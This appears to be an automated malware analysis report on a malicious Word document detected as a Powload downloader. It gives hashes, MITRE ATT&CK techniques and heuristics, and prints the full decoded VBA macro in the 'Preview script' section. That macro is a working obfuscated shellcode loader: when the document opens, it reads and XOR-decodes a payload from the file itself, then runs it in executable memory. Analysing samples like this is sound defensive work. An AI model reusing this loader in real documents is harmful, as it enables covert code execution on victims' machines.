Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 acf5e496f83420df…

MALICIOUS

Office (OLE)

37.1 KB Created: 2017-07-26 14:45:00 Authoring application: Microsoft Office Word First seen: 2017-08-08
MD5: 34c5c7236738611e91b19f447a75fec0 SHA-1: 1e380bcb56778cc1ba349acb1d4b122023885d3e SHA-256: acf5e496f83420df330753b313b6d8e9a8565dab3367c2333e6fdab31449102c
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1055.012 Process Injection

The sample is a Microsoft Office document containing VBA macros. The macros utilize Windows API functions such as VirtualAlloc and CreateThread, indicating an attempt to allocate memory and execute arbitrary code. The ClamAV detection 'Doc.Downloader.Powload-6809817-0' strongly suggests a downloader or loader functionality. The presence of these elements points to a malicious document designed to download and execute a second-stage payload.

Heuristics 7

  • ClamAV: Doc.Downloader.Powload-6809817-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Powload-6809817-0
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Public Sub Document_Open()
        FtGCibuvnHgQ
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
        Document_Open
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4875 bytes
SHA-256: 9cf9dfbbcbdf91c0bcd4068803c2b8c42ab425915fb222163d79c8beb4bf379d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
38 of 73 identifiers look randomly generated (e.g. 'iWDeHshsaQPReEerUghpuRsVMmCYvreuTYuqkeRN') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit

#If VBA7 Then
Private Declare PtrSafe Function nyihufQoVwZuSRqUwpxYnQN Lib "kernel32" Alias "CreateThread" (ByVal BrJdvj As Long, ByVal THdleSOagyrk As Long, ByVal XYhuFhkMxIOuoCRImL As LongPtr, LuPEbD As Long, ByVal mNNdQXdtgCkox As Long, YCvZoRPpWrT As Long) As LongPtr
Private Declare PtrSafe Function uFNLBWRvjdKEkYhfxjrCDahxA Lib "kernel32" Alias "VirtualAlloc" (ByVal gloOBlkrYXwffvGVik As Long, ByVal nOTGyIDnACVzEu As LongPtr, ByVal XtcIcsTzObJP As Long, ByVal vcteoWJNmFQgXYK As Long) As LongPtr
Private Declare PtrSafe Function NtWriteVirtualMemory Lib "NTDLL" (ByVal cxRLPynSzicupfEOShSyjRlI As LongPtr, ByVal CKNlCeujJMESeHWOAEgTpy As LongPtr, ByVal acnQfmGl As String, ByVal jamNzHXdIl As LongPtr, ByRef taWOzVJImeOveCNjpooW As LongPtr) As LongPtr
#Else
Private Declare Function nyihufQoVwZuSRqUwpxYnQN Lib "kernel32" Alias "CreateThread"  (ByVal BrJdvj As Long, ByVal THdleSOagyrk As Long, ByVal XYhuFhkMxIOuoCRImL As Long, LuPEbD As Long, ByVal mNNdQXdtgCkox As Long, YCvZoRPpWrT As Long) As Long
Private Declare Function uFNLBWRvjdKEkYhfxjrCDahxA Lib "kernel32" Alias "VirtualAlloc" (ByVal gloOBlkrYXwffvGVik As Long, ByVal nOTGyIDnACVzEu As Long, ByVal XtcIcsTzObJP As Long, ByVal vcteoWJNmFQgXYK As Long) As Long
Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal cxRLPynSzicupfEOShSyjRlI As Long, ByVal CKNlCeujJMESeHWOAEgTpy As Long, ByVal acnQfmGl As String, ByVal jamNzHXdIl As Long, ByRef taWOzVJImeOveCNjpooW As Long) As Long
#End If

Const ercmlFbQwjOkTy = &H1000
Const TVyrAqVBTnpoiMRSrHpuihWswYzmm = &H40

Public Sub FtGCibuvnHgQ()
    Dim SCQNfmCty() As Byte

    SCQNfmCty = QzJErMGBSMbpQBfMtxZfKCPN(ActiveDocument.FullName)
    Dim MIZsYPloAHKXaDyAvdhUfGzpx As String
    MIZsYPloAHKXaDyAvdhUfGzpx = StrConv(SCQNfmCty, 64)
    
    Dim aIcPEWhBTTiJwFbtFjzV
    aIcPEWhBTTiJwFbtFjzV = Split(MIZsYPloAHKXaDyAvdhUfGzpx, "iWDeHshsaQPReEerUghpuRsVMmCYvreuTYuqkeRNOrUaLnlaOIxKrxjrDIruPiXJMuXfkNhPouBcXsjzbBkMTtdwOdNBNxXFulorpfQbBIwWVhtlzSsoYkPsqBqgaFcRwWILeSkWLjllXgAHJBcVe")

    Dim npEQzlEMfjKVsPDmLc As String
    Dim nckOLXenJWUTYC As String
    Dim tFgjfxdjIkVmZQPIQEvROo As String
    nckOLXenJWUTYC = StrConv(StrConv(aIcPEWhBTTiJwFbtFjzV(UBound(aIcPEWhBTTiJwFbtFjzV)), 64), 128)
    tFgjfxdjIkVmZQPIQEvROo = Mid$(nckOLXenJWUTYC, 3, Len(nckOLXenJWUTYC))

    npEQzlEMfjKVsPDmLc = iiGQsHQtgpasu("GjwWaOOJbVFEAYyHgGHwCPZ", tFgjfxdjIkVmZQPIQEvROo)
    
    #If VBA7 Then
        Dim OYrFFFECgdjQjYVqTdFr As LongPtr
        Dim DDeQMZgUCQJonzqW As LongPtr
    #Else
        Dim OYrFFFECgdjQjYVqTdFr As Long
        Dim DDeQMZgUCQJonzqW As Long
    #End If

    OYrFFFECgdjQjYVqTdFr = uFNLBWRvjdKEkYhfxjrCDahxA(0, Len(npEQzlEMfjKVsPDmLc), ercmlFbQwjOkTy, TVyrAqVBTnpoiMRSrHpuihWswYzmm)
    DDeQMZgUCQJonzqW = NtWriteVirtualMemory(-1, OYrFFFECgdjQjYVqTdFr, npEQzlEMfjKVsPDmLc, Len(npEQzlEMfjKVsPDmLc), 0)
    DDeQMZgUCQJonzqW = nyihufQoVwZuSRqUwpxYnQN(0, 0, OYrFFFECgdjQjYVqTdFr, 0, 0, 0)
End Sub

Public Function QzJErMGBSMbpQBfMtxZfKCPN(ByVal yOeQygUgKebDKneSKMZeTU As String) As Byte()
    Dim nckOLXenJWUTYC As Long
    Dim tFgjfxdjIkVmZQPIQEvROo() As Byte
    nckOLXenJWUTYC = FreeFile
    If LenB(Dir(yOeQygUgKebDKneSKMZeTU)) Then
        Open yOeQygUgKebDKneSKMZeTU For Binary Access Read As nckOLXenJWUTYC
        ReDim tFgjfxdjIkVmZQPIQEvROo(LOF(nckOLXenJWUTYC) - 1&) As Byte
        Get nckOLXenJWUTYC, , tFgjfxdjIkVmZQPIQEvROo
        Close nckOLXenJWUTYC
    Else
        Err.Raise 53
    End If
    QzJErMGBSMbpQBfMtxZfKCPN = tFgjfxdjIkVmZQPIQEvROo
    Erase tFgjfxdjIkVmZQPIQEvROo
End Function

Public Sub Document_Open()
    FtGCibuvnHgQ
End Sub

Sub Workbook_Open()
    Document_Open
End Sub

Public Function iiGQsHQtgpasu(JOVjTCEQLexUndpCLWfnXbzGKBRQO As String, ZyvKgPzHUMNrxBtyuMeDEdmgaIpp As String) As String
    Dim rKNbOfZzCWzddbtA As Long
    Dim DXnmgeMlsVloJyAjiDbZ As String
    Dim IwtZRQEzAcTG As Integer, TGTVzwLrNOsfNZFDlPhLKyisAdy As Integer, a As Long

    For rKNbOfZzCWzddbtA = 1 To Len(ZyvKgPzHUMNrxBtyuMeDEdmgaIpp)
        a = rKNbOfZzCWzddbtA Mod Len(JOVjTCEQLexUndpCLWfnXbzGKBRQO)
        If a = 0 Then a = Len(JOVjTCEQLexUndpCLWfnXbzGKBRQO)
        
        IwtZRQEzAcTG = Asc(Mid$(ZyvKgPzHUMNrxBtyuMeDEdmgaIpp, rKNbOfZzCWzddbtA, 1))
        TGTVzwLrNOsfNZFDlPhLKyisAdy = Asc(Mid$(JOVjTCEQLexUndpCLWfnXbzGKBRQO, a, 1))
        DXnmgeMlsVloJyAjiDbZ = DXnmgeMlsVloJyAjiDbZ + Chr(IwtZRQEzAcTG Xor TGTVzwLrNOsfNZFDlPhLKyisAdy)
    Next rKNbOfZzCWzddbtA
    
   iiGQsHQtgpasu = DXnmgeMlsVloJyAjiDbZ
End Function